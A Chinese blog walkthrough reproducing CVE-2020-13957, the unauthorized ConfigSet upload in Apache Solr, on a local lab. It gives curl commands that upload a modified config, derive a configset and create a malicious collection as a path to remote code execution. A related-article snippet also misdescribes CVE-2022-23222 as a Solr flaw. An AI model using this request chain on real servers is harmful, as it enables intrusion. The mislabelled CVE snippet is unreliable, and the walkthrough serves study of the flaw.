Apache Solr RCE 未授权上传漏洞(CVE-2020-13957)

最新推荐文章于 2024-04-20 23:43:48 发布
最新推荐文章于 2024-04-20 23:43:48 发布
阅读量703 收藏
点赞数
分类专栏: 漏洞复现 文章标签: solr 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44047654/article/details/129038390
版权

Apache Solr RCE 未授权上传漏洞(CVE-2020-13957)

0x01 漏洞简介

Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。

Apache Solr 发布公告,旧版本的ConfigSet API 中存在未授权上传漏洞风险,被利用可能导致 RCE (远程代码执行)。

0x02 影响版本

  • Apache Solr6.6.0 -6.6.5
  • Apache Solr7.0.0 -7.7.3
  • Apache Solr8.0.0 -8.6.2

0x03 环境搭建

进入solr-8.2.0/bin目录下,使用命令启动一个cloud示例,默认安装即可。

solr.cmd start -e cloud -f -a "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=10010" -port 8983 -s "C:\Users\P\Desktop\solr\solr-8.2.0\example\example-DIH\solr"

显示到这一步表示安装完成

在这里插入图片描述

在浏览器输入http://127.0.0.1:8983/

0x04 漏洞复现

将solr目录\server\solr\configsets_default\conf下的solrconfig.xml中的params.resource.loader.enabled修改为true。(为远程命令执行做准备)

在这里插入图片描述

将conf目录文件打包成zip并上传

curl -X POST --header "Content-Type:application/octet-stream" --data-binary @conf.zip "http://127.0.0.1:8983/solr/admin/configs?action=UPLOAD&name=test"

在这里插入图片描述

创建成功http://127.0.0.1:8983/solr/admin/configs?action=LIST&omitHeader=true

在这里插入图片描述

根据UPLOAD的配置,创建一个新的配置,绕过不能通过直接UPLOAD创建collection的限制

curl "http:/127.0.0.1:8983/solr/admin/configs?action=CREATE&name=test1&baseConfigSet=test&configSetProp.immutable=false&wt=xml&omitHeader=true"

在这里插入图片描述

根据CREATE得到的新configset创建恶意collection

curl "http:/127.0.0.1:8983/solr/admin/collections?action=CREATE&numShards=1&name=test2&collection.configName=test1"

在这里插入图片描述

利用已上传的collection进行远程命令执行

在这里插入图片描述

吉吉_大王
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-13957 —— Apache Solr 授权文件上传漏洞
战神/calmness的博客
12-09 348
CVE-2020-13957 | Apache Solr 授权文件上传漏洞 Apache Solr 组件介绍 Apache Solr是一个开源的搜索服务器。具有高度可靠、可伸缩和容错的,提供分布式索引、复制和负载平衡查询、自动故障转移和恢复、集中配置等功能。 Solr为世界上许多的互联网站点提供搜索和导航功能。Solr使用Java语言开发,主要基于HTTP和Apache Lucene实现。 Apache Solr中存储的资源是以Document 为对象进行存储的。每个文档由一系列的 Fi.
Apache Solr 授权上传RCE漏洞CVE-2020-13957)加固操作指南
乐大厨串串香飘万里
08-09 615
Apache Solr 授权上传RCE漏洞CVE-2020-13957
solr 历史漏洞复现之RCE漏洞CVE-2019-17558)
最新发布
m0_66490812的博客
04-20 468
优先复现 Solr RCE 漏洞,严重等级较高漏洞Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞Solr系统上执行任意代码。
Apache Solr漏洞总结(比较全面的哦)
热门推荐
yangbz123的博客
06-11 1万+
目录框架概述Wiki百科百度百科漏洞列表1.远程命令执行RCECVE-2017-12629)漏洞详情漏洞复现影响版本修复方案2.远程命令执行XXE(CVE-2017-12629)漏洞详情漏洞复现影响版本修复方案3.任意文件读取AND命令执行(CVE-2019-17558)漏洞详情漏洞复现3.1代码执行3.2任意文件读取影响版本修复方案4.远程命令执行漏洞(CVE-2019-0192)漏洞详情漏洞复现影响版本修复方案5.远程命令执行漏洞(CVE-2019-0193)漏洞详情漏洞复现影响版本修复方案6.授权
solr-web页面授权访问漏洞整改-身份认证授权访问
鲸落资源
04-21 1731
②在/server/contexts 文件夹下添加以下内容,并将文件名设置为:solr-jetty-context.xml(有可能已存在该文件,可直接编辑修改(添加至尾部即可))solr的web页面是无需授权认证即可登陆访问的,但这种情况在安全性要求较高的项目中,是有风险的,一般的渗透测试,都会发现存在这个问题,那么就需要进行整改了。注释:test登陆账号,888888密码,admin 表示当前用户授权的是admin 角色,这里用户可以配置多个账号(每行一个)2、进行用户认证,授权访问
Apche Solr 授权上传漏洞CVE-2020-13957
m0_48520508的博客
11-13 433
0x00简介 Solr 是一个开源的企业级搜索服务器,底层使用易于扩展和修改的Java 来实现。服务器通信使用标准的HTTP 和XML,所以如果使用Solr 了解Java 技术会有用却不是必须的要求。 Solr 主要特性有:强大的全文检索功能,高亮显示检索结果,动态集群,数据库接口和电子文档(Word ,PDF 等)的处理。而且Solr 具有高度的可扩展,支持分布搜索和索引的复制。 0x01漏洞概述 Apache Solr 发布公告,旧版本的 ConfigSet API 中存在授权上传漏洞风险,被利用可
Apache Solr RCECVE-2020-13957授权上传漏洞 + Velocity模板远程执行(CVE-2019-17558)复现
ximo的博客
04-28 485
漏洞概述 (CVE-2020-13957授权上传漏洞: 在特定的Solr版本中ConfigSet API存在授权上传漏洞 ,配合CVE-2019-17558可执行任意命令。 (CVE-2019-17558)Velocity模板远程执行: 攻击者在知道Solr服务器上Core名称后,先把params.resource.loader.enabled设置为true(就可加载指定资源),再进行远程执行命令。 配合CVE-2020-13957上传漏洞上传Core,进行攻击。 影响版本 CVE-2020-1395
Apche Solr 授权上传漏洞CVE-2020-13957)复现
weixin_47531489的博客
07-19 377
1 简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 2 漏洞概述 Apache Solr发布公告,旧版本的ConfigSet API中存在授权上传漏洞风险,被利用可能导致RCE(远程代码执行)。威胁等级为高危 3 影响版本 Apache Solr 6.6.0-6.6.5 Apache Solr
CVE-2020-13957 Apache Solr 授权上传.md
04-13
CVE-2020-13957 Apache Solr 授权上传
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。安全从业者遵守法律规定,禁止在没有得到授权的情况下做任何突破检测。 简介 理论上可以...
CVE-2019-0193 Apache-Solr via Velocity template RCE.MD
04-12
CVE-2019-0193 Apache-Solr via Velocity template RCE
Apache Solr 授权上传RCE漏洞CVE-2020-13957)的原理分析与验证
smellycat000的专栏
10-15 1213
聚焦源代码安全,网罗国内外最新资讯!01漏洞简介Apache Solr 发布公告,旧版本的ConfigSet API 中存在授权上传漏洞风险,被利用可能导致 RCE (远程代码执行)...
CVE-2020-13957:Apche Solr 授权上传漏洞的分析及复现(环境搭建+复现)
weixin_46745178的博客
11-20 1606
CVE-2020-13957:Apche Solr 授权上传漏洞的分析及复现 一、漏洞描述 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 Solr 主要特性有:强大的全文检索功能,高亮显示检索结果,动态集群,数据库接口和电子文档(Word ,PDF 等)的处理。而且Solr 具有高度的可扩展,支持分布搜索和索
CVE-2020-13957: Apache Solr ConfigSet 文件上传漏洞通告
爱国小白帽
10-13 2120
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-101301 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-13 0x01漏洞简述 2020年10月13日,360CERT监测发现solr发布了solr 文件上传漏洞的风险公告,该突破编号为CVE-2020-13957,突破等级:高危,突破得分:7.2。 攻击者可以通过结合UPLOAD/CREATE这两个ACTION在ConfigSet API上进行授权
Apache Solr 访问权限控制
weixin_34194087的博客
11-07 331
在Tomcat6增加 Solr访问权限方法如下: 编辑tomcat6/Catalina/localhost/solr.xml <Context docBase="/var/solr/solr.war" debug="0" privileged="true" allowLinking="true" crossContext="true"><Environmen
cve-2022-23222 复现
04-28
CVE-2022-23222是一个相关于Apache Solr漏洞,恶意攻击者通过该漏洞可以导致Solr服务拒绝响应或服务中断。要复现这个漏洞,需要进行以下操作: 1. 安装并配置Apache Solr服务; 2. 发送一个HTTP请求,其中查询参数需要包含一个bad中的特殊字符,例如'() {内网IP地址}'; 3. Solr服务将无法识别该特殊字符并将停止响应,此时攻击者便可以利用这个漏洞进行攻击。 需要注意的是,为了成功复现此漏洞,需要具备一定的技术水平。同时,攻击者在进行测试时需要谨慎,以免对目标服务器造成不必要的损失。 为了避免该漏洞对系统造成影响,建议及时更新Solr服务程序,升级至最新版本。如果您发现自己的系统已经受到攻击,应立即断开与互联网的连接,并及时咨询安全专业人员解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值